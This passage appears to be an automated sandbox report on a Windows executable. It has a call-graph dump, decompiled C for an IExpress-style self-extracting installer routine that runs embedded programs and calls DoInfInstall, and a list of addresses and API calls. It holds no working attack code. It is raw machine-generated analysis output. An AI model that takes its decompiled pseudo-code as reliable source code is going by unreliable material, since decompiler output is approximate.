2848 10c5547 2843->2848 2849 10c658a CharPrevA 2844->2849 2855 10c54da 2845->2855 2846->2699 2858 10c2630 GetWindowsDirectoryA 2846->2858 2850 10c6285 GetLastError 2847->2850 2848->2842 2849->2853 2854 10c557c 2850->2854 2852 10c555c 2851->2852 2852->2837 2857 10c5568 RemoveDirectoryA 2852->2857 2906 10c58c8 2853->2906 2854->2837 2855->2844 2856 10c658a CharPrevA 2855->2856 2856->2844 2857->2837 2859 10c265e 2858->2859 2860 10c266f 2858->2860 2862 10c44b9 20 API calls 2859->2862 2861 10c6ce0 4 API calls 2860->2861 2863 10c2687 2861->2863 2862->2860 2863->2697 2863->2710 2865 10c696e GetDiskFreeSpaceA 2864->2865 2866 10c69a1 2864->2866 2865->2866 2867 10c6989 MulDiv 2865->2867 2866->2718 2867->2866 2869 10c59dd GetDiskFreeSpaceA 2868->2869 2870 10c59bb 2868->2870 2872 10c5ba1 memset 2869->2872 2873 10c5a21 MulDiv 2869->2873 2871 10c44b9 20 API calls 2870->2871 2874 10c59cc 2871->2874 2875 10c6285 GetLastError 2872->2875 2873->2872 2876 10c5a50 GetVolumeInformationA 2873->2876 2877 10c6285 GetLastError 2874->2877 2878 10c5bbc GetLastError FormatMessageA 2875->2878 2879 10c5a6e memset 2876->2879 2880 10c5ab5 SetCurrentDirectoryA 2876->2880 2892 10c59d1 2877->2892 2881 10c5be3 2878->2881 2882 10c6285 GetLastError 2879->2882 2889 10c5acc 2880->2889 2884 10c44b9 20 API calls 2881->2884 2885 10c5a89 GetLastError FormatMessageA 2882->2885 2883 10c5b94 2886 10c6ce0 4 API calls 2883->2886 2887 10c5bf5 SetCurrentDirectoryA 2884->2887 2885->2881 2888 10c5c11 2886->2888 2887->2883 2888->2697 2890 10c5b0a 2889->2890 2893 10c5b20 2889->2893 2891 10c44b9 20 API calls 2890->2891 2891->2892 2892->2883 2893->2883 2918 10c268b 2893->2918 2897 10c53bf 2895->2897 2896 10c171e _vsnprintf 2896->2897 2897->2896 2898 10c658a CharPrevA 2897->2898 2901 10c5415 GetTempFileNameA 2897->2901 2899 10c53fa RemoveDirectoryA GetFileAttributesA 2898->2899 2899->2897 2900 10c544f CreateDirectoryA 2899->2900 2900->2901 2902 10c543a 2900->2902 2901->2902 2903 10c5429 DeleteFileA CreateDirectoryA 
2901->2903 2904 10c6ce0 4 API calls 2902->2904 2903->2902 2905 10c5449 2904->2905 2905->2840 2907 10c58d8 2906->2907 2907->2907 2908 10c58df LocalAlloc 2907->2908 2909 10c5919 2908->2909 2910 10c58f3 2908->2910 2913 10c658a CharPrevA 2909->2913 2911 10c44b9 20 API calls 2910->2911 2916 10c5906 2911->2916 2912 10c6285 GetLastError 2917 10c5534 2912->2917 2914 10c5931 CreateFileA LocalFree 2913->2914 2915 10c595b CloseHandle GetFileAttributesA 2914->2915 2914->2916 2915->2916 2916->2912 2916->2917 2917->2842 2917->2843 2919 10c26b9 2918->2919 2920 10c26e5 2918->2920 2921 10c171e _vsnprintf 2919->2921 2922 10c26ea 2920->2922 2926 10c271f 2920->2926 2923 10c26cc 2921->2923 2924 10c171e _vsnprintf 2922->2924 2927 10c44b9 20 API calls 2923->2927 2929 10c26fd 2924->2929 2925 10c26e3 2928 10c6ce0 4 API calls 2925->2928 2926->2925 2930 10c171e _vsnprintf 2926->2930 2927->2925 2931 10c276d 2928->2931 2932 10c44b9 20 API calls 2929->2932 2933 10c2735 2930->2933 2931->2883 2932->2925 2934 10c44b9 20 API calls 2933->2934 2934->2925 2936 10c468f 7 API calls 2935->2936 2937 10c4ff5 FindResourceA LoadResource LockResource 2936->2937 2938 10c5020 2937->2938 2939 10c515f 2937->2939 2940 10c5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2938->2940 2941 10c5057 2938->2941 2939->2737 2940->2941 2957 10c4efd 2941->2957 2944 10c5060 2945 10c44b9 20 API calls 2944->2945 2951 10c5075 2945->2951 2946 10c5106 2949 10c511d 2946->2949 2950 10c5110 FreeResource 2946->2950 2947 10c50e8 2948 10c44b9 20 API calls 2947->2948 2948->2951 2952 10c513a 2949->2952 2954 10c5129 2949->2954 2950->2949 2951->2946 2952->2939 2956 10c514c SendMessageA 2952->2956 2953 10c507c 2953->2946 2953->2947 2955 10c44b9 20 API calls 2954->2955 2955->2952 2956->2939 2958 10c4f4a 2957->2958 2959 10c4980 25 API calls 2958->2959 2964 10c4fa1 2958->2964 2962 10c4f67 2959->2962 2960 10c6ce0 4 API calls 2961 10c4fc6 2960->2961 2961->2944 2961->2953 2963 10c4b60 FindCloseChangeNotification 2962->2963 2962->2964 2963->2964 
2964->2960 2966 10c255b 2965->2966 2967 10c2510 2965->2967 2969 10c6ce0 4 API calls 2966->2969 2968 10c658a CharPrevA 2967->2968 2970 10c2522 WritePrivateProfileStringA _lopen 2968->2970 2971 10c2569 2969->2971 2970->2966 2972 10c2548 _llseek _lclose 2970->2972 2971->2745 2972->2966 2974 10c1b25 2973->2974 3077 10c1a84 2974->3077 2976 10c1b57 2977 10c658a CharPrevA 2976->2977 2979 10c1b8c 2976->2979 2977->2979 2978 10c66c8 2 API calls 2980 10c1bd1 2978->2980 2979->2978 2981 10c1bd9 CompareStringA 2980->2981 2982 10c1d73 2980->2982 2981->2982 2983 10c1bf7 GetFileAttributesA 2981->2983 2984 10c66c8 2 API calls 2982->2984 2985 10c1c0d 2983->2985 2986 10c1d53 2983->2986 2987 10c1d7d 2984->2987 2985->2986 2992 10c1a84 2 API calls 2985->2992 2990 10c44b9 20 API calls 2986->2990 2988 10c1df8 LocalAlloc 2987->2988 2989 10c1d81 CompareStringA 2987->2989 2988->2986 2991 10c1e0b GetFileAttributesA 2988->2991 2989->2988 2998 10c1d9b 2989->2998 3011 10c1cc2 2990->3011 2993 10c1e1d 2991->2993 2994 10c1e45 2991->2994 2995 10c1c31 2992->2995 2993->2994 3083 10c2aac 2994->3083 2996 10c1c50 LocalAlloc 2995->2996 3001 10c1a84 2 API calls 2995->3001 2996->2986 2999 10c1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2996->2999 2997 10c6ce0 4 API calls 3000 10c1ea1 2997->3000 2998->2998 3002 10c1dbe LocalAlloc 2998->3002 3005 10c1cf8 2999->3005 2999->3011 3000->2759 3001->2996 3002->2986 3007 10c1de1 3002->3007 3008 10c1d09 GetShortPathNameA 3005->3008 3009 10c1d23 3005->3009 3006 10c1e89 3006->2997 3010 10c171e _vsnprintf 3007->3010 3008->3009 3012 10c171e _vsnprintf 3009->3012 3010->3011 3011->3006 3012->3011 3014 10c209a 3013->3014 3015 10c2256 3013->3015 3017 10c171e _vsnprintf 3014->3017 3020 10c20dc 3014->3020 3016 10c6ce0 4 API calls 3015->3016 3018 10c2263 3016->3018 3019 10c20af RegQueryValueExA 3017->3019 3018->2759 3019->3014 3019->3020 3021 10c20fb GetSystemDirectoryA 3020->3021 3022 10c20e4 RegCloseKey 3020->3022 3023 10c658a CharPrevA 3021->3023 3022->3015 3024 10c211b 
LoadLibraryA 3023->3024 3025 10c212e GetProcAddress FreeLibrary 3024->3025 3026 10c2179 GetModuleFileNameA 3024->3026 3025->3026 3028 10c214e GetSystemDirectoryA 3025->3028 3027 10c21de RegCloseKey 3026->3027 3031 10c2177 3026->3031 3027->3015 3029 10c2165 3028->3029 3028->3031 3030 10c658a CharPrevA 3029->3030 3030->3031 3031->3031 3032 10c21b7 LocalAlloc 3031->3032 3033 10c21ec 3032->3033 3034 10c21cd 3032->3034 3036 10c171e _vsnprintf 3033->3036 3035 10c44b9 20 API calls 3034->3035 3035->3027 3037 10c2218 RegSetValueExA RegCloseKey LocalFree 3036->3037 3037->3015 3040 10c4016 CreateProcessA 3039->3040 3051 10c4106 3039->3051 3041 10c40c4 3040->3041 3042 10c4041 WaitForSingleObject GetExitCodeProcess 3040->3042 3045 10c6285 GetLastError 3041->3045 3047 10c4070 3042->3047 3043 10c6ce0 4 API calls 3044 10c4117 3043->3044 3044->2759 3046 10c40c9 GetLastError FormatMessageA 3045->3046 3049 10c44b9 20 API calls 3046->3049 3110 10c411b 3047->3110 3049->3051 3050 10c4096 CloseHandle CloseHandle 3050->3051 3052 10c40ba 3050->3052 3051->3043 3052->3051 3054 10c64c2 3053->3054 3055 10c658a CharPrevA 3054->3055 3056 10c64d8 GetFileAttributesA 3055->3056 3057 10c64ea 3056->3057 3058 10c6501 LoadLibraryA 3056->3058 3057->3058 3059 10c64ee LoadLibraryExA 3057->3059 3060 10c6508 3058->3060 3059->3060 3061 10c6ce0 4 API calls 3060->3061 3062 10c6513 3061->3062 3062->2785 3064 10c2289 RegOpenKeyExA 3063->3064 3065 10c2381 3063->3065 3064->3065 3067 10c22b1 RegQueryValueExA 3064->3067 3066 10c6ce0 4 API calls 3065->3066 3068 10c238c 3066->3068 3069 10c2374 RegCloseKey 3067->3069 3070 10c22e6 memset GetSystemDirectoryA 3067->3070 3068->2757 3069->3065 3071 10c230f 3070->3071 3072 10c2321 3070->3072 3073 10c658a CharPrevA 3071->3073 3074 10c171e _vsnprintf 3072->3074 3073->3072 3075 10c233f RegSetValueExA 3074->3075 3075->3069 3078 10c1a9a 3077->3078 3080 10c1aba 3078->3080 3082 10c1aaf 3078->3082 3096 10c667f 3078->3096 3080->2976 3081 10c667f 2 API calls 3081->3082 3082->3080 
3082->3081 3084 10c2be6 3083->3084 3085 10c2ad4 GetModuleFileNameA 3083->3085 3086 10c6ce0 4 API calls 3084->3086 3087 10c2b02 3085->3087 3089 10c2bf5 3086->3089 3087->3084 3088 10c2af1 IsDBCSLeadByte 3087->3088 3090 10c2bca CharNextA 3087->3090 3091 10c2b11 CharNextA CharUpperA 3087->3091 3092 10c2bd3 CharNextA 3087->3092 3095 10c2b43 CharPrevA 3087->3095 3101 10c65e8 3087->3101 3088->3087 3089->3006 3090->3092 3091->3087 3093 10c2b8d CharUpperA 3091->3093 3092->3087 3093->3087 3095->3087 3099 10c6689 3096->3099 3097 10c66a5 3097->3078 3098 10c6648 IsDBCSLeadByte 3098->3099 3099->3097 3099->3098 3100 10c6697 CharNextA 3099->3100 3100->3099 3102 10c65f4 3101->3102 3102->3102 3103 10c65fb CharPrevA 3102->3103 3104 10c6611 CharPrevA 3103->3104 3105 10c660b 3104->3105 3106 10c661e 3104->3106 3105->3104 3105->3106 3107 10c663d 3106->3107 3108 10c6634 CharNextA 3106->3108 3109 10c6627 CharPrevA 3106->3109 3107->3087 3108->3107 3109->3107 3109->3108 3111 10c4132 3110->3111 3113 10c412a 3110->3113 3114 10c1ea7 3111->3114 3113->3050 3115 10c1ed3 3114->3115 3116 10c1eba 3114->3116 3115->3113 3117 10c256d 15 API calls 3116->3117 3117->3115 3119 10c2026 3118->3119 3120 10c1ff0 RegOpenKeyExA 3118->3120 3119->2473 3120->3119 3121 10c200f RegDeleteValueA RegCloseKey 3120->3121 3121->3119 3231 10c6a20 __getmainargs 3232 10c19e0 3233 10c1a24 GetDesktopWindow 3232->3233 3234 10c1a03 3232->3234 3236 10c43d0 11 API calls 3233->3236 3235 10c1a20 3234->3235 3237 10c1a16 EndDialog 3234->3237 3239 10c6ce0 4 API calls 3235->3239 3238 10c1a33 LoadStringA SetDlgItemTextA MessageBeep 3236->3238 3237->3235 3238->3235 3240 10c1a7e 3239->3240 3241 10c7176 3242 10c717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3241->3242 3243 10c717a 3241->3243 3244 10c71cd 3242->3244 3243->3242 3243->3244 3245 10c7270 _except_handler4_common 3246 10c69b0 3247 10c69b5 3246->3247 3255 10c6fbe GetModuleHandleW 3247->3255 3249 10c69c1 __set_app_type 
__p__fmode __p__commode 3250 10c69f9 3249->3250 3251 10c6a0e 3250->3251 3252 10c6a02 __setusermatherr 3250->3252 3257 10c71ef _controlfp 3251->3257 3252->3251 3254 10c6a13 3256 10c6fcf 3255->3256 3256->3249 3257->3254 3258 10c34f0 3259 10c3504 3258->3259 3260 10c35b8 3258->3260 3259->3260 3261 10c35be GetDesktopWindow 3259->3261 3262 10c351b 3259->3262 3263 10c3526 3260->3263 3267 10c3671 EndDialog 3260->3267 3264 10c43d0 11 API calls 3261->3264 3265 10c354f 3262->3265 3266 10c351f 3262->3266 3268 10c35d6 3264->3268 3265->3263 3270 10c3559 ResetEvent 3265->3270 3266->3263 3269 10c352d TerminateThread EndDialog 3266->3269 3267->3263 3271 10c361d SetWindowTextA CreateThread 3268->3271 3272 10c35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3268->3272 3269->3263 3273 10c44b9 20 API calls 3270->3273 3271->3263 3274 10c3646 3271->3274 3272->3271 3275 10c3581 3273->3275 3276 10c44b9 20 API calls 3274->3276 3277 10c359b SetEvent 3275->3277 3279 10c358a SetEvent 3275->3279 3276->3260 3278 10c3680 4 API calls 3277->3278 3278->3260 3279->3263 3280 10c6ef0 3281 10c6f2d 3280->3281 3283 10c6f02 3280->3283 3282 10c6f27 ?terminate@ 3282->3281 3283->3281 3283->3282

Callgraph

[Call graph figure; nodes run from Function_010C490C to Function_010C6EF0. Legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available.]

Control-flow Graph

[Control-flow graph figure, starting at block 10c3ba2-10c3bd9. Legend: Executed; Not Executed.]
                                                          C-Code - Quality: 82%
                                                          			E010C3BA2() {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				char _v276;
                                                          				char _v280;
                                                          				short _v300;
                                                          				intOrPtr _v304;
                                                          				void _v348;
                                                          				char _v352;
                                                          				intOrPtr _v356;
                                                          				signed int _v360;
                                                          				short _v364;
                                                          				char* _v368;
                                                          				intOrPtr _v372;
                                                          				void* _v376;
                                                          				intOrPtr _v380;
                                                          				char _v384;
                                                          				signed int _v388;
                                                          				intOrPtr _v392;
                                                          				signed int _v396;
                                                          				signed int _v400;
                                                          				signed int _v404;
                                                          				void* _v408;
                                                          				void* _v424;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t69;
                                                          				signed int _t76;
                                                          				void* _t77;
                                                          				signed int _t79;
                                                          				short _t96;
                                                          				signed int _t97;
                                                          				intOrPtr _t98;
                                                          				signed int _t101;
                                                          				signed int _t104;
                                                          				signed int _t108;
                                                          				int _t112;
                                                          				void* _t115;
                                                          				signed char _t118;
                                                          				void* _t125;
                                                          				signed int _t127;
                                                          				void* _t128;
                                                          				struct HINSTANCE__* _t129;
                                                          				void* _t130;
                                                          				short _t137;
                                                          				char* _t140;
                                                          				signed char _t144;
                                                          				signed char _t145;
                                                          				signed int _t149;
                                                          				void* _t150;
                                                          				void* _t151;
                                                          				signed int _t153;
                                                          				void* _t155;
                                                          				void* _t156;
                                                          				signed int _t157;
                                                          				signed int _t162;
                                                          				signed int _t164;
                                                          				void* _t165;
                                                          
                                                          				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                          				_t69 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t69 ^ _t164;
                                                          				_t153 = 0;
                                                          				 *0x10c9124 =  *0x10c9124 & 0;
                                                          				_t149 = 0;
                                                          				_v388 = 0;
                                                          				_v384 = 0;
                                                          				_t165 =  *0x10c8a28 - _t153; // 0x0
                                                          				if(_t165 != 0) {
                                                          					L3:
                                                          					_t127 = 0;
                                                          					_v392 = 0;
                                                          					while(1) {
                                                          						_v400 = _v400 & 0x00000000;
                                                          						memset( &_v348, 0, 0x44);
                                                          						_t164 = _t164 + 0xc;
                                                          						_v348 = 0x44;
                                                          						if( *0x10c8c42 != 0) {
                                                          							goto L26;
                                                          						}
                                                          						_t146 =  &_v396;
                                                          						_t115 = E010C468F("SHOWWINDOW",  &_v396, 4);
                                                          						if(_t115 == 0 || _t115 > 4) {
                                                          							L25:
                                                          							_t146 = 0x4b1;
                                                          							E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          							 *0x10c9124 = 0x80070714;
                                                          							goto L62;
                                                          						} else {
                                                          							if(_v396 != 1) {
                                                          								__eflags = _v396 - 2;
                                                          								if(_v396 != 2) {
                                                          									_t137 = 3;
                                                          									__eflags = _v396 - _t137;
                                                          									if(_v396 == _t137) {
                                                          										_v304 = 1;
                                                          										_v300 = _t137;
                                                          									}
                                                          									goto L14;
                                                          								}
                                                          								_push(6);
                                                          								_v304 = 1;
                                                          								_pop(0);
                                                          								goto L11;
                                                          							} else {
                                                          								_v304 = 1;
                                                          								L11:
                                                          								_v300 = 0;
                                                          								L14:
                                                          								if(_t127 != 0) {
                                                          									L27:
                                                          									_t155 = 1;
                                                          									__eflags = _t127 - 1;
                                                          									if(_t127 != 1) {
                                                          										L31:
                                                          										_t132 =  &_v280;
                                                          										_t76 = E010C1AE8( &_v280,  &_v408,  &_v404); // executed
                                                          										__eflags = _t76;
                                                          										if(_t76 == 0) {
                                                          											L62:
                                                          											_t77 = 0;
                                                          											L63:
                                                          											_pop(_t150);
                                                          											_pop(_t156);
                                                          											_pop(_t128);
                                                          											return E010C6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                          										}
                                                          										_t157 = _v404;
                                                          										__eflags = _t149;
                                                          										if(_t149 != 0) {
                                                          											L37:
                                                          											__eflags = _t157;
                                                          											if(_t157 == 0) {
                                                          												L57:
                                                          												_t151 = _v408;
                                                          												_t146 =  &_v352;
                                                          												_t130 = _t151; // executed
                                                          												_t79 = E010C3FEF(_t130,  &_v352); // executed
                                                          												__eflags = _t79;
                                                          												if(_t79 == 0) {
                                                          													L61:
                                                          													LocalFree(_t151);
                                                          													goto L62;
                                                          												}
                                                          												L58:
                                                          												LocalFree(_t151);
                                                          												_t127 = _t127 + 1;
                                                          												_v396 = _t127;
                                                          												__eflags = _t127 - 2;
                                                          												if(_t127 >= 2) {
                                                          													_t155 = 1;
                                                          													__eflags = 1;
                                                          													L69:
                                                          													__eflags =  *0x10c8580;
                                                          													if( *0x10c8580 != 0) {
                                                          														E010C2267();
                                                          													}
                                                          													_t77 = _t155;
                                                          													goto L63;
                                                          												}
                                                          												_t153 = _v392;
                                                          												_t149 = _v388;
                                                          												continue;
                                                          											}
                                                          											L38:
                                                          											__eflags =  *0x10c8180;
                                                          											if( *0x10c8180 == 0) {
                                                          												_t146 = 0x4c7;
                                                          												E010C44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                          												LocalFree(_v424);
                                                          												 *0x10c9124 = 0x8007042b;
                                                          												goto L62;
                                                          											}
                                                          											__eflags = _t157;
                                                          											if(_t157 == 0) {
                                                          												goto L57;
                                                          											}
                                                          											__eflags =  *0x10c9a34 & 0x00000004;
                                                          											if(__eflags == 0) {
                                                          												goto L57;
                                                          											}
                                                          											_t129 = E010C6495(_t127, _t132, _t157, __eflags);
                                                          											__eflags = _t129;
                                                          											if(_t129 == 0) {
                                                          												_t146 = 0x4c8;
                                                          												E010C44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                          												L65:
                                                          												LocalFree(_v408);
                                                          												 *0x10c9124 = E010C6285();
                                                          												goto L62;
                                                          											}
                                                          											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                          											_v404 = _t146;
                                                          											__eflags = _t146;
                                                          											if(_t146 == 0) {
                                                          												_t146 = 0x4c9;
                                                          												__eflags = 0;
                                                          												E010C44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                          												FreeLibrary(_t129);
                                                          												goto L65;
                                                          											}
                                                          											__eflags =  *0x10c8a30;
                                                          											_t151 = _v408;
                                                          											_v384 = 0;
                                                          											_v368 =  &_v280;
                                                          											_t96 =  *0x10c9a40; // 0x3
                                                          											_v364 = _t96;
                                                          											_t97 =  *0x10c8a38 & 0x0000ffff;
                                                          											_v380 = 0x10c9154;
                                                          											_v376 = _t151;
                                                          											_v372 = 0x10c91e4;
                                                          											_v360 = _t97;
                                                          											if( *0x10c8a30 != 0) {
                                                          												_t97 = _t97 | 0x00010000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											_t144 =  *0x10c9a34; // 0x1
                                                          											__eflags = _t144 & 0x00000008;
                                                          											if((_t144 & 0x00000008) != 0) {
                                                          												_t97 = _t97 | 0x00020000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											__eflags = _t144 & 0x00000010;
                                                          											if((_t144 & 0x00000010) != 0) {
                                                          												_t97 = _t97 | 0x00040000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											_t145 =  *0x10c8d48; // 0x0
                                                          											__eflags = _t145 & 0x00000040;
                                                          											if((_t145 & 0x00000040) != 0) {
                                                          												_t97 = _t97 | 0x00080000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											__eflags = _t145;
                                                          											if(_t145 < 0) {
                                                          												_t104 = _t97 | 0x00100000;
                                                          												__eflags = _t104;
                                                          												_v360 = _t104;
                                                          											}
                                                          											_t98 =  *0x10c9a38; // 0x0
                                                          											_v356 = _t98;
                                                          											_t130 = _t146;
                                                          											 *0x10ca288( &_v384);
                                                          											_t101 = _v404();
                                                          											__eflags = _t164 - _t164;
                                                          											if(_t164 != _t164) {
                                                          												_t130 = 4;
                                                          												asm("int 0x29");
                                                          											}
                                                          											 *0x10c9124 = _t101;
                                                          											_push(_t129);
                                                          											__eflags = _t101;
                                                          											if(_t101 < 0) {
                                                          												FreeLibrary();
                                                          												goto L61;
                                                          											} else {
                                                          												FreeLibrary();
                                                          												_t127 = _v400;
                                                          												goto L58;
                                                          											}
                                                          										}
                                                          										__eflags =  *0x10c9a40 - 1; // 0x3
                                                          										if(__eflags == 0) {
                                                          											goto L37;
                                                          										}
                                                          										__eflags =  *0x10c8a20;
                                                          										if( *0x10c8a20 == 0) {
                                                          											goto L37;
                                                          										}
                                                          										__eflags = _t157;
                                                          										if(_t157 != 0) {
                                                          											goto L38;
                                                          										}
                                                          										_v388 = 1;
                                                          										E010C202A(_t146); // executed
                                                          										goto L37;
                                                          									}
                                                          									_t146 =  &_v280;
                                                          									_t108 = E010C468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                          									__eflags = _t108;
                                                          									if(_t108 == 0) {
                                                          										goto L25;
                                                          									}
                                                          									__eflags =  *0x10c8c42;
                                                          									if( *0x10c8c42 != 0) {
                                                          										goto L69;
                                                          									}
                                                          									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                          									__eflags = _t112 == 0;
                                                          									if(_t112 == 0) {
                                                          										goto L69;
                                                          									}
                                                          									goto L31;
                                                          								}
                                                          								_t118 =  *0x10c8a38; // 0x0
                                                          								if(_t118 == 0) {
                                                          									L23:
                                                          									if(_t153 != 0) {
                                                          										goto L31;
                                                          									}
                                                          									_t146 =  &_v276;
                                                          									if(E010C468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                          										goto L27;
                                                          									}
                                                          									goto L25;
                                                          								}
                                                          								if((_t118 & 0x00000001) == 0) {
                                                          									__eflags = _t118 & 0x00000002;
                                                          									if((_t118 & 0x00000002) == 0) {
                                                          										goto L62;
                                                          									}
                                                          									_t140 = "USRQCMD";
                                                          									L20:
                                                          									_t146 =  &_v276;
                                                          									if(E010C468F(_t140,  &_v276, 0x104) == 0) {
                                                          										goto L25;
                                                          									}
                                                          									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                          										_t153 = 1;
                                                          										_v388 = 1;
                                                          									}
                                                          									goto L23;
                                                          								}
                                                          								_t140 = "ADMQCMD";
                                                          								goto L20;
                                                          							}
                                                          						}
                                                          						L26:
                                                          						_push(_t130);
                                                          						_t146 = 0x104;
                                                          						E010C1781( &_v276, 0x104, _t130, 0x10c8c42);
                                                          						goto L27;
                                                          					}
                                                          				}
                                                          				_t130 = "REBOOT";
                                                          				_t125 = E010C468F(_t130, 0x10c9a2c, 4);
                                                          				if(_t125 == 0 || _t125 > 4) {
                                                          					goto L25;
                                                          				} else {
                                                          					goto L3;
                                                          				}
                                                          			}





























































                                                          0x010c3fda
                                                          0x010c3fda
                                                          0x010c3fe1
                                                          0x010c3fe3
                                                          0x010c3fe3
                                                          0x010c3fe8
                                                          0x00000000
                                                          0x010c3fe8
                                                          0x010c3f33
                                                          0x010c3f37
                                                          0x00000000
                                                          0x010c3f37
                                                          0x010c3dee
                                                          0x010c3dee
                                                          0x010c3df5
                                                          0x010c3fad
                                                          0x010c3fb9
                                                          0x010c3fc2
                                                          0x010c3fc8
                                                          0x00000000
                                                          0x010c3fc8
                                                          0x010c3dfb
                                                          0x010c3dfd
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3e03
                                                          0x010c3e0a
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3e15
                                                          0x010c3e17
                                                          0x010c3e19
                                                          0x010c3f94
                                                          0x010c3fa4
                                                          0x010c3f7c
                                                          0x010c3f80
                                                          0x010c3f8b
                                                          0x00000000
                                                          0x010c3f8b
                                                          0x010c3e2c
                                                          0x010c3e30
                                                          0x010c3e34
                                                          0x010c3e36
                                                          0x010c3f69
                                                          0x010c3f6e
                                                          0x010c3f70
                                                          0x010c3f76
                                                          0x00000000
                                                          0x010c3f76
                                                          0x010c3e3c
                                                          0x010c3e43
                                                          0x010c3e47
                                                          0x010c3e52
                                                          0x010c3e56
                                                          0x010c3e5c
                                                          0x010c3e61
                                                          0x010c3e68
                                                          0x010c3e70
                                                          0x010c3e74
                                                          0x010c3e7c
                                                          0x010c3e80
                                                          0x010c3e82
                                                          0x010c3e82
                                                          0x010c3e87
                                                          0x010c3e87
                                                          0x010c3e8b
                                                          0x010c3e91
                                                          0x010c3e94
                                                          0x010c3e96
                                                          0x010c3e96
                                                          0x010c3e9b
                                                          0x010c3e9b
                                                          0x010c3e9f
                                                          0x010c3ea2
                                                          0x010c3ea4
                                                          0x010c3ea4
                                                          0x010c3ea9
                                                          0x010c3ea9
                                                          0x010c3ead
                                                          0x010c3eb3
                                                          0x010c3eb6
                                                          0x010c3eb8
                                                          0x010c3eb8
                                                          0x010c3ebd
                                                          0x010c3ebd
                                                          0x010c3ec1
                                                          0x010c3ec3
                                                          0x010c3ec5
                                                          0x010c3ec5
                                                          0x010c3eca
                                                          0x010c3eca
                                                          0x010c3ece
                                                          0x010c3ed5
                                                          0x010c3ed9
                                                          0x010c3ee0
                                                          0x010c3ee6
                                                          0x010c3eea
                                                          0x010c3eec
                                                          0x010c3eee
                                                          0x010c3ef3
                                                          0x010c3ef3
                                                          0x010c3ef5
                                                          0x010c3efa
                                                          0x010c3efb
                                                          0x010c3efd
                                                          0x010c3f40
                                                          0x00000000
                                                          0x010c3eff
                                                          0x010c3eff
                                                          0x010c3f05
                                                          0x00000000
                                                          0x010c3f05
                                                          0x010c3efd
                                                          0x010c3dc7
                                                          0x010c3dce
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3dd0
                                                          0x010c3dd7
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3dd9
                                                          0x010c3ddb
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3ddd
                                                          0x010c3de1
                                                          0x00000000
                                                          0x010c3de1
                                                          0x010c3d59
                                                          0x010c3d65
                                                          0x010c3d6a
                                                          0x010c3d6c
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3d6e
                                                          0x010c3d75
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3d8f
                                                          0x010c3d96
                                                          0x010c3d98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3d98
                                                          0x010c3c8f
                                                          0x010c3c98
                                                          0x010c3cf1
                                                          0x010c3cf3
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3cfe
                                                          0x010c3d11
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3d11
                                                          0x010c3c9c
                                                          0x010c3ca5
                                                          0x010c3ca7
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3cad
                                                          0x010c3cb2
                                                          0x010c3cb7
                                                          0x010c3cc5
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3ce8
                                                          0x010c3cec
                                                          0x010c3ced
                                                          0x010c3ced
                                                          0x00000000
                                                          0x010c3ce8
                                                          0x010c3c9e
                                                          0x00000000
                                                          0x010c3c9e
                                                          0x010c3c56
                                                          0x010c3d35
                                                          0x010c3d35
                                                          0x010c3d3c
                                                          0x010c3d48
                                                          0x00000000
                                                          0x010c3d48
                                                          0x010c3c03
                                                          0x010c3be2
                                                          0x010c3be7
                                                          0x010c3bee
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • memset.MSVCRT ref: 010C3C11
                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010C3CDC
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
